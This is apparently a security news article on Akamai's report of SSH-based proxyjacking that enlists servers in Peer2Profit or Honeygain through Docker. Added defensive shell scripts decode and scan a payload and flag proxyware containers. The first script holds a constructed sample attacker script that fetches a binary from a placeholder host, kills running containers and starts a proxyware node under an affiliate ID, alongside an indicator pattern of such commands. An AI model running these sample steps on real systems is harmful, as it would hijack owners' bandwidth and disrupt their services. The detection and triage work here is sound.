Threat actors are exploiting vulnerable Secure Shell (SSH) servers to launch Docker containers for an emerging and lucrative attack vector that hijacks a victim's network bandwidth and sells it for money.
Researchers from the Akamai Security Intelligence Response Team (SIRT) in June discovered the currently active campaign, which employs an emerging type of attack called proxyjacking, the researchers revealed in a blog post last week.
Threat actors use SSH for remote access and then run malicious scripts that enlist victim servers into a legitimate peer-to-peer (P2P) proxy network, such as Peer2Profit or Honeygain, without the owner's knowledge, the researchers said. These networks, which run companion apps or software on Internet-connected devices, let device owners share their spare Internet bandwidth: customers pay the network to route traffic through the app users' IP addresses, and the account that registered the device is paid for the bandwidth it contributes.
“This allows for the attacker to monetize an unsuspecting victim’s extra bandwidth, with only a fraction of the resource load that would be required for cryptomining, with less chance of discovery,” Allen West, an SIRT security researcher, wrote in the post.
In a nutshell, that is proxyjacking, an emerging attack model that takes advantage of these services and, on a grand scale, potentially can earn cybercriminals hundreds of thousands of dollars per month in passive income, the researchers found.
While the idea of proxyjacking is not new — think of cryptojacking, an entirely illegal endeavor, as a distant cousin — the ability to easily monetize piggybacking on someone’s bandwidth as affiliates of mainstream companies is new, which explains why security researchers are seeing more proxyjacking in the threat landscape, West warned.
“Providing a simple path to financial gain makes this vector a threat to both the corporate world and the average consumer alike, heightening the need for awareness and, hopefully, mitigation,” he wrote.
Proxyjacking also makes it easy for threat actors to hide their tracks by routing malicious traffic through a multitude of peer nodes before it reaches its final destination, according to the research. This makes the origin of the nefarious activity difficult for victims or researchers to pinpoint — another attractive option for attackers looking to monetize their activity without consequence.
How the Attack Works
The first indication of the attack that Akamai researchers identified came when an attacker established multiple SSH connections to one of the company’s honeypots using a double Base64-encoded Bash script to obscure the activity. They successfully decoded the script and were able to observe the proxyjacking method of the threat actor down to the exact sequence of operations.
The script transformed the compromised system into a node in the Peer2Profit proxy network, using the account specified by $PACCT as the affiliate that profits from the shared bandwidth, according to Akamai SIRT. The same process was seen being used for a Honeygain installation a while later.
“The script was designed to be stealthy and robust, attempting to operate regardless of the software installed on the host system,” West wrote.
The script goes on to execute various functions, one of which is to download an actual, unmodified version of cURL, a command-line tool that enables data exchange between a device and a server through a terminal.
This tool seems to be all the attackers need for the scheme to work, and, “if it is not present on the victim host, then the attacker downloads it on their behalf,” West wrote.
The script stops any containers already running on the host and then installs a Docker container that handles the proxyjacking process. Once everything is in place, the attacker can leave the network without a trace.
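The triage sequence described above, peeling the Base64 layers and then reading the script for the steps the report lists (the affiliate variable, the cURL download, the container teardown and the container start), as an added example that is not part of Akamai's research or the page's own material. The encoded sample is constructed here to mirror those steps; the affiliate ID, the download URL, the container name and the image name are placeholders, not observed indicators, and the indicator pattern is a heuristic assumed for this example.

```shell
#!/bin/sh
# Added example: triage a doubly Base64-encoded command captured over SSH.
# Nothing below is Akamai's script. The sample is constructed to mirror the
# steps the article describes; affiliate ID, URL, image and name are placeholders.

# Constructed sample of the kind of Bash the attacker would send (placeholders).
SAMPLE_SCRIPT='PACCT="AFFILIATE_ID_PLACEHOLDER"
command -v curl >/dev/null 2>&1 || wget -qO /tmp/curl https://example.invalid/curl
docker ps -q | xargs -r docker kill
docker run -d --name p2p_node -e "email=$PACCT" example/proxyware-placeholder:latest'

# Apply Base64 twice, as the observed campaign did, to produce a test payload.
encode_twice() {
  printf '%s' "$1" | base64 | base64
}

# Peel $2 layers of Base64 from payload $1 and print the plaintext.
# Returns non-zero if any layer is not valid Base64.
decode_layers() {
  payload=$1
  layers=$2
  while [ "$layers" -gt 0 ]; do
    payload=$(printf '%s' "$payload" | base64 -d) || return 1
    layers=$((layers - 1))
  done
  printf '%s\n' "$payload"
}

# Indicators taken from the article's description of the script: the affiliate
# variable, a cURL/wget fetch, container teardown or start, and the two network
# names. The exact pattern is an assumption for this example.
INDICATOR_PATTERN='PACCT|curl|wget|docker (run|kill|rm|stop)|honeygain|peer2profit'

# Print each line of a decoded script that matches an indicator.
find_indicators() {
  grep -iE "$INDICATOR_PATTERN" || true
}

# Count matching lines; prints 0 when there are none.
count_indicators() {
  grep -ciE "$INDICATOR_PATTERN" || true
}

# End to end: decode a two-layer payload, print the matching lines and a summary.
triage_payload() {
  decoded=$(decode_layers "$1" 2) || { echo "decode failed" >&2; return 1; }
  printf '%s\n' "$decoded" | find_indicators
  printf 'indicator lines: %s\n' "$(printf '%s\n' "$decoded" | count_indicators)"
}

# Stand-alone demo: encode the constructed sample the way the attacker would,
# then run the triage over it.
triage_payload "$(encode_twice "$SAMPLE_SCRIPT")"
```

On a real capture, pass the Base64 blob taken from the SSH session log to triage_payload in place of the constructed payload; if the first decode yields more Base64 rather than Bash, raise the layer count passed to decode_layers.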
How Do You Defend Against Proxyjacking?
Because proxyjacking is becoming more prevalent, is relatively easy for attackers to set up, and leaves the original perpetrators hard to identify, organizations need to watch their networks for abnormal behavior in how their resources are being used, the researchers recommend.
For the particular attack that the Akamai team observed, attackers used SSH to gain access to a server and install a Docker container. To catch this type of attack, organizations can check their locally running Docker services for any unwanted resource sharing on the system, according to Akamai. If they find any, the intrusion should be investigated to determine how the script was uploaded and run, after which a thorough clean-up should be performed.
Also notable in this attack is that the cURL executable would likely be overlooked by most companies, since the tool has legitimate uses. In this case, however, it was the initial artifact that led the researchers to investigate further, West said.
“It was the ability to look at the source of the artifact that took it from a harmless piece of code to what we now know is part of a proxyjacking scheme,” he explained, which “highlights the importance of being able to isolate all unusual artifacts, not just those that are considered malicious.”
Moreover, because proxyjacking attackers also use vulnerabilities to mount attacks — that was the case in a recent attack that leveraged the infamous Log4j flaw — organizations should maintain updated assets and apply patches to applications whenever available, particularly when vulnerabilities already have been exploited, the research recommends.
West added: “Users with deeper knowledge of computer security can additionally remain vigilant by paying attention to the containers currently running, monitoring network traffic for anomalies, and even running vulnerability scans on a regular basis.”
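One way to act on the advice in the two passages above, checking locally running Docker services and keeping an eye on which containers are running, as an added example rather than Akamai's tooling. It wraps docker ps and flags containers whose image, name or command mentions either of the two proxy networks the article names; the container table embedded below is constructed for demonstration and its image and container names are placeholders, not observed indicators.

```shell
#!/bin/sh
# Added example: flag running containers that look like proxyware nodes.
# Not Akamai's tooling. The pattern uses the two networks the article names;
# the sample table is constructed and its images and names are placeholders.

PROXYWARE_PATTERN='honeygain|peer2profit'

# Live container table in the layout flag_proxyware expects (needs the Docker CLI).
list_containers() {
  docker ps --no-trunc --format '{{.ID}}\t{{.Image}}\t{{.Names}}\t{{.Command}}'
}

# Read "id<TAB>image<TAB>name<TAB>command" lines on stdin and print
# "id<TAB>image<TAB>name<TAB>matched-field" for each line that matches.
flag_proxyware() {
  awk -F '\t' -v pat="$PROXYWARE_PATTERN" '
    {
      field = ""
      if (tolower($2) ~ pat)      field = "image"
      else if (tolower($3) ~ pat) field = "name"
      else if (tolower($4) ~ pat) field = "command"
      if (field != "") printf "%s\t%s\t%s\t%s\n", $1, $2, $3, field
    }'
}

# Run against the live host. Exits non-zero when anything is flagged, so it can
# sit in cron or a monitoring job and raise an alert.
audit_host() {
  hits=$(list_containers | flag_proxyware)
  [ -z "$hits" ] && return 0
  printf 'suspected proxyware containers:\n%s\n' "$hits"
  return 1
}

# Constructed sample table (placeholders): one benign container, one whose image
# names a proxy network, one whose container name does.
SAMPLE_PS=$(printf '%s\t%s\t%s\t%s\n' \
  a1b2c3 nginx:1.25 web '"nginx -g daemon off;"' \
  d4e5f6 example/honeygain-placeholder:latest node1 '"/app/start"' \
  0f9e8d ubuntu:22.04 peer2profit_worker '"/bin/sh -c ./run"')

# Stand-alone demo over the constructed table (no Docker needed).
printf '%s\n' "$SAMPLE_PS" | flag_proxyware
```

Name matching is only a first pass: an attacker can rename the container and retag the image, so a hit is a reason to run docker inspect and docker logs on the container and to pull the SSH authentication log for the same window, while a miss says nothing about a container started under a neutral name.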